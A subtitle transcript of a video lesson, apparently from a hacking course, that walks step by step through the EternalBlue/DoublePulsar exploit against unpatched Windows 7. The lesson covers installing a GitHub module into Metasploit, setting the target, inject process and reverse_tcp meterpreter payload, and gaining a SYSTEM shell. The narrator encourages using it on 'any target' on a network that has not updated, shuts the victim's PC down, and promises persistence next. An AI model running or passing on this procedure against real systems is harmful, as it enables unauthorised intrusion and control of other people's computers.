1 00:00:00,030 --> 00:00:05,190 Hello everybody and welcome back. And finally we get to the eternalblue 2 00:00:05,190 --> 00:00:11,100 exploit developed by the NSA. Now as I said before, this is an exploit for the Windows 7 3 00:00:11,099 --> 00:00:17,369 machine. So you will need to download the Windows 7 machine first. Now the link 4 00:00:17,369 --> 00:00:22,019 where I downloaded it from is this one. I will just type it right here so you can 5 00:00:22,020 --> 00:00:27,870 use the same link. It comes with both the 64-bit and 32-bit version. You can 6 00:00:27,869 --> 00:00:32,129 download any of those you want. Now I will not be going through the 7 00:00:32,130 --> 00:00:35,610 installation of Windows 7 since it is rather simple. You just 8 00:00:35,610 --> 00:00:40,620 follow the steps and it will work for you. The link where I downloaded it from 9 00:00:40,620 --> 00:00:52,740 is this one, so https://bit.ly/2wppApz https://bit.ly/2wppApz. And if 10 00:00:52,739 --> 00:00:58,289 you go to that link, let us just let this load, it should give you an option to 11 00:00:58,289 --> 00:01:06,449 download both the 64-bit and 32-bit windows 7 operating system. So here it is. As we 12 00:01:06,450 --> 00:01:10,260 can see, it will lead you to this page right here. You scroll down and you can 13 00:01:10,260 --> 00:01:16,920 choose each one, either one of these two. It is the size of 3.09 gigabytes for the 14 00:01:16,920 --> 00:01:22,800 64, or the 32-bit version is 2.38 gigabytes. Now in this tutorial I will 15 00:01:22,799 --> 00:01:31,919 use the 64-bit version of Windows 7, but both of these will work as well. Now if 16 00:01:31,920 --> 00:01:37,830 you have for example a VirtualBox machine with the Windows Server 2008, that one 17 00:01:37,829 --> 00:01:44,369 will work as well. So let's see how to get this to run. So what you want to do, 18 00:01:44,369 --> 00:01:53,339 let me just zoom this in, if you go to the msfconsole you will see that there 19 00:01:53,340 --> 00:01:58,200 actually are already some eternal blue exploits in it. But what we want to do is 20 00:01:58,200 --> 00:02:03,120 actually download one from github, since that one will actually allow us to get 21 00:02:03,119 --> 00:02:06,989 the meterpreter shell back. There is one called the eternal blue in the 22 00:02:06,990 --> 00:02:13,410 Metasploit framework. It basically comes pre-installed. But, that 23 00:02:13,410 --> 00:02:15,900 one only gives you back the command shell. 24 00:02:15,900 --> 00:02:20,070 It doesn't give you back the meterpreter shell with all the 25 00:02:20,070 --> 00:02:24,720 options that the meterpreter comes with. So we want to get the most of it, so we 26 00:02:24,720 --> 00:02:29,790 will download the eternal blue double pulsar on github. And we will add it to 27 00:02:29,790 --> 00:02:36,390 the Metasploit framework database and we will be able to use it. So if I search 28 00:02:36,390 --> 00:02:43,710 here search eternalblue, you will see, now I need to unzoom this so it doesn't 29 00:02:43,710 --> 00:02:48,720 look this ugly, you will see that we have two auxiliary modules right here. One of 30 00:02:48,720 --> 00:02:52,980 them is a scanner, so basically it will scan the Machine and check if the 31 00:02:52,980 --> 00:02:56,430 machine is vulnerable to the attack, and these three right here will actually 32 00:02:56,430 --> 00:03:02,010 attack the machine itself. So the first one works on Windows 7. The second 33 00:03:02,010 --> 00:03:07,260 one, well basically this one it says if I use it, if I use the internal blue 34 00:03:07,260 --> 00:03:15,680 Windows 8 edition copy and paste it, and then show targets for this, 35 00:03:15,680 --> 00:03:22,320 it says windows 64. Now if I show info as well it will say that basically it will 36 00:03:22,320 --> 00:03:27,000 say that this also works on the Windows 10, which I highly doubt. As we can see, 37 00:03:27,000 --> 00:03:32,240 enternal blue exploit for Windows 8, Windows 10 and Windows Server 2012 by 38 00:03:32,240 --> 00:03:37,290 sleepya. The exploit might fail and crash a target system depended on what is 39 00:03:37,290 --> 00:03:43,500 overwritten. The exploit support only x64 target tested on Windows 2012. So it is 40 00:03:43,500 --> 00:03:52,080 tested on Windows 10, Windows 8.1 and Windows 2012. But if you show 41 00:03:52,080 --> 00:03:56,340 options, I might be doing something wrong, but the the only required spot right 42 00:03:56,340 --> 00:04:02,850 here is set RHOST to 192. 168.1.3 which 43 00:04:02,850 --> 00:04:08,100 is the IP address of my windows 10 machine. Let me just check it out real 44 00:04:08,100 --> 00:04:13,500 quick. So type ifconfig, and we can see the .1.3 indeed is the IP 45 00:04:13,500 --> 00:04:18,150 address of my target machine. Now as it says right here, this exploits on port 46 00:04:18,150 --> 00:04:23,160 445, which by the installation of Windows 7, for example, already comes open by 47 00:04:23,160 --> 00:04:27,780 default. So most of the targets that actually didn't update their 48 00:04:27,780 --> 00:04:32,640 Windows 7 will still be vulnerable to this attack. Now about Windows 8 and 49 00:04:32,639 --> 00:04:41,189 Windows 10, I'm not really sure. Since, for example, if I show you -sV -p 445 50 00:04:41,190 --> 00:04:47,040 on my Windows 10 machine, and if I nmap it, it will say that the port is open. 51 00:04:47,040 --> 00:04:53,370 It will give us the version so the port really is open. But this exploit right 52 00:04:53,370 --> 00:05:00,420 here probably only works for the almost never updated Windows 10 machines. Now 53 00:05:00,419 --> 00:05:07,109 I have the 445 port open, but if I just run here exploit, let me set the payload 54 00:05:07,110 --> 00:05:15,690 first. So set payload windows/x64/ since my target is 64 bit, meterpreter/ 55 00:05:15,690 --> 00:05:22,950 reverse_tcp. And I run this...and let me just check show options in order to see 56 00:05:22,950 --> 00:05:29,100 if I need to setup the LHOST is the IP address of us, which is ifconfig, which 57 00:05:29,100 --> 00:05:35,190 is up there. And if I exploit, you will see that this won't really work. 58 00:05:35,190 --> 00:05:39,870 As it says right here, this exploit does not support this build. So this exploit right 59 00:05:39,870 --> 00:05:45,530 here is only for this certain type of build, it will not work on some 60 00:05:45,530 --> 00:05:51,000 Windows 10 machines. Well, on most of them it will not work. Especially on those 61 00:05:51,000 --> 00:05:57,870 that regularly download their updates. So, you can check these several 62 00:05:57,870 --> 00:06:03,450 eternalblue exploits right here. Let me just search them once again, search eternalblue. 63 00:06:03,450 --> 00:06:06,900 You can check them if you want to but what we want to do right now 64 00:06:06,900 --> 00:06:12,390 is download the extended one that will give us the meterpreter shell. So let us 65 00:06:12,390 --> 00:06:21,570 do that right now. Go to Firefox, and where you want to go right now is search, 66 00:06:21,570 --> 00:06:31,590 basically on the Google search bar, eternalblue doublepulsar github. And it 67 00:06:31,590 --> 00:06:36,420 will lead us to the first link which is this EleventhPaths/Eternalblue-Doublepulsar- 68 00:06:36,419 --> 00:06:42,239 Metasploit. We want to download this module into the /root 69 00:06:42,240 --> 00:06:46,890 directory, so make sure that it is downloaded in the /root directory. We 70 00:06:46,889 --> 00:06:51,539 will do that right now. What you want to do is the same thing as with 71 00:06:51,539 --> 00:06:57,829 program that we use. So just copy the link we will go over this. 72 00:06:57,830 --> 00:07:06,210 Then we go to the cd /root, we will print working directory in order to 73 00:07:06,210 --> 00:07:11,550 make sure, and we git clone and then the eternalblure double pulsar .git. And 74 00:07:11,550 --> 00:07:17,250 this will clone the program for us in our repository. Make sure that it indeed 75 00:07:17,250 --> 00:07:23,460 is in the /root repository since it by default in the settings it will check 76 00:07:23,460 --> 00:07:27,390 for that path. Now I will show you this later on, but for now just make sure 77 00:07:27,389 --> 00:07:32,639 that you downloaded it from the root directory. So if I just up here 78 00:07:32,639 --> 00:07:37,919 pwd /root, and ls, we can see that right now we have the eternalblue in 79 00:07:37,919 --> 00:07:43,439 that repository. Now the next thing you want to do, and for that I will just 80 00:07:43,440 --> 00:07:48,990 leave the Metasploit for a second, so what you want to do is find your 81 00:07:48,990 --> 00:07:54,320 Metasploit path. So your Metasploit path, so just locate, type here locate 82 00:07:54,320 --> 00:07:59,610 metasploit-framework. Now it is in the usr/share I believe. Yeah, it's in the 83 00:07:59,610 --> 00:08:05,850 usr/share. And what you want to do once you find it, you want to copy the two 84 00:08:05,849 --> 00:08:10,319 packets from the eternalblue. So let me just change my directory to the program 85 00:08:10,320 --> 00:08:15,060 that we downloaded. You have this subdirectory right here, and you also 86 00:08:15,060 --> 00:08:20,880 have this right here. What you want to do with these two is you want to copy them 87 00:08:20,880 --> 00:08:26,880 to the modules in Metasploit framework, to the windows 88 00:08:26,880 --> 00:08:31,980 exploits, then to the SMB exploits. So, let me just show you what I mean. What we 89 00:08:31,979 --> 00:08:37,609 want to do is first change our directory to the usr/share/metasploit-framework, 90 00:08:37,610 --> 00:08:44,940 then LS, cd modules/. Change to to exploits first, 91 00:08:44,940 --> 00:08:52,140 then change to Windows, and then SMB. And right here we have all the modules or 92 00:08:52,140 --> 00:08:57,200 all the exploits for the SMB protocol. As you can see there are the other eternal 93 00:08:57,200 --> 00:09:01,730 blue protocols right here, here they are, and what we want to do is we want to add 94 00:09:01,730 --> 00:09:07,700 these two files right here to this directory. So we just cp /root/ 95 00:09:07,700 --> 00:09:11,570 eternalblue which is the path to our program, and let's first copy the 96 00:09:11,570 --> 00:09:18,230 directory. We want to copy it to usr/share/metasploit-framework/modules/exploits, 97 00:09:18,230 --> 00:09:25,520 and then to the windows, and then smb. And -r for the directory so it copies the 98 00:09:25,519 --> 00:09:29,389 directory. And if I just type here ls once again you can see it is right here. 99 00:09:29,390 --> 00:09:34,880 And we also want to copy, so let us use the same command, but instead we want to 100 00:09:34,880 --> 00:09:38,360 copy the eternalblue_doublepulsar 101 00:09:38,360 --> 00:09:45,290 .ruby. So we copy that one as well and we can see now they are both in 102 00:09:45,290 --> 00:09:52,040 this directory now. We will be able to access them within 103 00:09:52,040 --> 00:09:56,810 the Metasploit framework command line or msfconsole. Now before we 104 00:09:56,810 --> 00:10:00,980 start with that you need to make sure for one more thing that is running, and 105 00:10:00,980 --> 00:10:06,800 that is the wine program. If you don't know what wine is I explained it 106 00:10:06,800 --> 00:10:11,510 in some of the previous videos. I showed you how you can download it, and we also 107 00:10:11,510 --> 00:10:15,380 downloaded Python with wine. So make sure to check out that video if you do not 108 00:10:15,380 --> 00:10:22,100 have it. The wine path is, let me just close this so it doesn't bother us, so 109 00:10:22,100 --> 00:10:28,820 the path is to root/.wine/drive_c. As we can see if you 110 00:10:28,820 --> 00:10:32,420 remember from the previous videos, this is the path to our drive C folder, which 111 00:10:32,420 --> 00:10:38,810 is the virtual Windows C folder, which has basically Windows files. As we can 112 00:10:38,810 --> 00:10:44,030 see, Program Files x86 and Program Files. Now it is also important to know your 113 00:10:44,029 --> 00:10:49,029 wine path since we will need to specify it in the attack, in the 114 00:10:49,029 --> 00:10:55,339 target attacking. So right now that we did all that what you want to do is 115 00:10:55,339 --> 00:11:00,409 change to root, first of all, and then run msfconsole. Now we should be good to 116 00:11:00,410 --> 00:11:05,600 go and we should be able to use the eternalblue doublepulsar exploit. So 117 00:11:05,600 --> 00:11:09,280 you will see how powerful this is. First of all, what you 118 00:11:09,280 --> 00:11:14,200 to do is, in case you didn't, you want to install Windows 7, 119 00:11:14,200 --> 00:11:20,560 since this only works on windows 7 and Server 2008. I already have it installed 120 00:11:20,560 --> 00:11:24,460 right here and I followed all the steps. And also make sure that after you 121 00:11:24,460 --> 00:11:28,540 install it, or not after towards the end of the installation, it will ask you 122 00:11:28,540 --> 00:11:31,300 for the security measures of Windows 7. 123 00:11:31,300 --> 00:11:35,770 Make sure to add no security measures and to not update it. Since if it 124 00:11:35,770 --> 00:11:39,910 performs all of the updates it will perform the update for the eternalblue as 125 00:11:39,910 --> 00:11:45,190 well, and then this will not work. So, make sure at the end, it will prompt you 126 00:11:45,190 --> 00:11:49,690 with a question at the end asking that. You just make sure to not update at all 127 00:11:49,690 --> 00:11:54,550 and you will be good to go. So I will just start up my windows 7. Hopefully 128 00:11:54,550 --> 00:12:00,160 nothing goes slow because I am running two virtual machines right now. I gave 129 00:12:00,160 --> 00:12:07,360 this one around 1.5 gigabytes of RAM, so we will see how that will go. I do not 130 00:12:07,360 --> 00:12:12,250 have a password so we will just let this login. And while that is going, we want to 131 00:12:12,250 --> 00:12:17,890 search exploit Windows, since that is the path that with SMB, and eternalblue 132 00:12:17,890 --> 00:12:22,480 double pulsar. As we can see if you tab it, it will automatically find it since 133 00:12:22,480 --> 00:12:27,670 we put it in the correct folder, or in the correct directory, which is the SMB 134 00:12:27,670 --> 00:12:32,860 directory under windows, under exploits. So just click here enter. And if we 135 00:12:32,860 --> 00:12:37,390 clear the screen and show all available options, we can see the things that we 136 00:12:37,390 --> 00:12:42,010 need to specify in order to run this. Now make sure to notice that all of this is 137 00:12:42,010 --> 00:12:47,770 required, so all of these specifications are required. This is the reason why I 138 00:12:47,770 --> 00:12:51,970 told you that you copy the path into the root directory, since this is already 139 00:12:51,970 --> 00:12:56,500 preset for the root directory. Now you could have changed it but it doesn't 140 00:12:56,500 --> 00:13:02,110 really matter at the moment. We have eternalblue double pulsar in the root 141 00:13:02,110 --> 00:13:07,540 directory, which is good. If we just check that, so PWD, we are in the root directory, LS, 142 00:13:07,540 --> 00:13:12,730 and it still really is there. So that is good. Now let's show our options once 143 00:13:12,730 --> 00:13:19,150 again. The next thing you want to specify is the project process to inject. Now if 144 00:13:19,150 --> 00:13:26,340 you downloaded the 32-bit Windows 7 you should leave this process like this. if 145 00:13:26,340 --> 00:13:33,320 you have a 64-bit Windows 7 version, you should change it to the lsass.exe 146 00:13:33,320 --> 00:13:39,120 or to the explorer.exe. But the difference between these two is that the 147 00:13:39,120 --> 00:13:43,140 explorer.exe won't give you the system privileges during the 148 00:13:43,140 --> 00:13:48,090 exploitation. So we want to actually use this one right here. As it says, it is for 149 00:13:48,090 --> 00:13:55,860 the 64-bit version. So we set PROCESSINJECT, and then we copy the process 150 00:13:55,860 --> 00:14:01,080 name, and then we paste it. So it will set the process for us. As you can see in 151 00:14:01,080 --> 00:14:06,690 show options, the process is currently set. The RHOST is basically the same as 152 00:14:06,690 --> 00:14:10,590 in the all the previous exploits. It is basically the IP address of your windows 153 00:14:10,590 --> 00:14:17,790 7 machine, so we will check that out right now. We have Windows 7 right here. 154 00:14:17,790 --> 00:14:24,870 if I go there and type cmd for the command prompt...it is a little bit slow 155 00:14:24,870 --> 00:14:29,400 since I'm running two machines at the time. But we will get used to it. So I 156 00:14:29,400 --> 00:14:33,750 just type here ipconfig right here. The IP address of the Windows 7 machine is 157 00:14:33,750 --> 00:14:44,760 .1.5. So, we need to know that, set RHOST 192.168.1.5. Now that we 158 00:14:44,760 --> 00:14:50,220 set that, the next thing we want to change is the target architecture. The 159 00:14:50,220 --> 00:14:56,160 out port should stay on 445 since the SMB service port is 445. But the target 160 00:14:56,160 --> 00:15:01,640 architecture we want to change in case we downloaded the X64 bit version, and 161 00:15:01,640 --> 00:15:07,770 we did. So we want to type here X64 instead of x86. Now if you downloaded once 162 00:15:07,770 --> 00:15:14,480 again the 32 bit version, you should leave this on x86. So set 163 00:15:14,480 --> 00:15:21,330 TARGETARCHITECTURE x64, and let's clear the screen and show our options once again 164 00:15:21,330 --> 00:15:26,250 to see if everything is good. The wine path is correct since wine is stored 165 00:15:26,250 --> 00:15:31,650 in /root/.wine/drive_c. Now the 166 00:15:31,650 --> 00:15:36,720 targets, let's see show targets, it will say 167 00:15:36,720 --> 00:15:42,570 the targets are all windows, basically, versions until Windows 7. So we can see 168 00:15:42,569 --> 00:15:47,369 that we have Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 169 00:15:47,370 --> 00:15:52,530 and Windows 7 all packs. So, we select a target, so 170 00:15:52,529 --> 00:16:01,709 SET target 8. I believe it something like 171 00:16:01,709 --> 00:16:14,879 that. Or is it set targets, or possibly select target. Now I don't even 172 00:16:14,879 --> 00:16:28,949 know, I maybe forgot this. Let's see this one. Ok, doesn't even matter. So I don't 173 00:16:28,949 --> 00:16:33,149 know the syntax for this, but it is not really needed for us to type that in 174 00:16:33,149 --> 00:16:39,269 order for this work. So, show options. Basically, it is already set for 175 00:16:39,269 --> 00:16:44,359 windows 7, I don't know why I tried that, and right now we should be good to go. 176 00:16:44,360 --> 00:16:53,250 But, one more thing to do is to set the payload. Now be careful since the payload 177 00:16:53,250 --> 00:16:58,530 for Windows meterpreter reverse TCP will not work here if you have a 64-bit 178 00:16:58,529 --> 00:17:03,239 Windows 7 that you are attacking. But if you have a 32-bit Windows 7 that you're 179 00:17:03,240 --> 00:17:07,770 attacking, the meterpreter reverse TCP will work. For the 64-bit we need to set 180 00:17:07,770 --> 00:17:18,000 the payload to be windows/x64/meterpreter and then 181 00:17:18,000 --> 00:17:22,590 reverse_tcp. Since we are attacking Windows 7 64 bit we need to have the 182 00:17:22,589 --> 00:17:29,219 windows 64-bit meterpreter shell. So show options, and we 183 00:17:29,220 --> 00:17:34,290 set the LHOST. So LHOST is our IP address, so 192.168.1.4 I 184 00:17:34,289 --> 00:17:41,069 believe, we clear the screen, and we run the attack. So exploit and we let this 185 00:17:41,070 --> 00:17:46,020 run. As we can see, this is the entire attack, and just by typing exploit we 186 00:17:46,020 --> 00:17:50,650 should be able to get the meterpreter session back. 187 00:17:50,650 --> 00:17:55,600 It is launching the attack, as we can see eternalblue, so this will take a few 188 00:17:55,600 --> 00:18:01,690 seconds. The attack is basically writing DLL in this root/wine/drive_c/eternal.dll 189 00:18:01,690 --> 00:18:08,140 I believe. Eternal11.dll. And right now we should 190 00:18:08,140 --> 00:18:14,260 be able to get the meterpreter shell back. Here it is. Launching double pulsar, 191 00:18:14,260 --> 00:18:19,450 we got this session back. Now if you notice right here, if I just type here 192 00:18:19,450 --> 00:18:26,050 getuid, you will see that basically we got this session to be system. So we with 193 00:18:26,050 --> 00:18:30,460 a simple exploit command, without the targets having to click on anything or 194 00:18:30,460 --> 00:18:34,060 download anything, we were able to exploit the target. 195 00:18:34,060 --> 00:18:38,620 So with this exploit you can exploit any target that is currently connected to 196 00:18:38,620 --> 00:18:42,580 the network that didn't update their Windows 7 for a long time. Since this 197 00:18:42,580 --> 00:18:47,470 exploit is from I believe April 2017, anyone who didn't perform updates since 198 00:18:47,470 --> 00:18:52,180 then, and trust me there are a lot of people who did who didn't, you will be 199 00:18:52,180 --> 00:18:57,850 able to exploit them with the authority system privileges. And right now you can 200 00:18:57,850 --> 00:19:02,080 do basically anything that we did in a previous video. So, for example, if you 201 00:19:02,080 --> 00:19:08,500 wanted to you could just, let you just move this to the side, you could just shut 202 00:19:08,500 --> 00:19:12,960 down their PC, or perform persistence, or something like that. 203 00:19:12,960 --> 00:19:20,430 Now let us actually perform the persistence. 204 00:19:23,910 --> 00:19:28,300 I'm not sure why this...it doesn't even matter. What we will do is we will 205 00:19:28,300 --> 00:19:33,670 shut down the PC, so shut down, and you will see that this basically will shut 206 00:19:33,670 --> 00:19:38,080 down their PC. It will kill our meterpreter session of course, but we 207 00:19:38,080 --> 00:19:42,130 don't care. We can exploit the target whenever we want since the target 208 00:19:42,130 --> 00:19:45,460 doesn't have to click on anything. We basically can just do whatever we 209 00:19:45,460 --> 00:19:50,890 want to the target. So just click here exit, and we should be good to go. 210 00:19:50,890 --> 00:19:56,080 Now in the next video I will show you how you can create a persistent 211 00:19:56,080 --> 00:20:01,660 Metasploit or meterpreter reverse shell running on a target PC. Now by persistent 212 00:20:01,660 --> 00:20:06,370 I mean that whenever the target restarts their system you will be able to connect 213 00:20:06,370 --> 00:20:11,800 back to them as soon as they login. So that'll be about it for this video. I 214 00:20:11,800 --> 00:20:16,710 hope you enjoyed it and I hope I see you in the next one. Bye!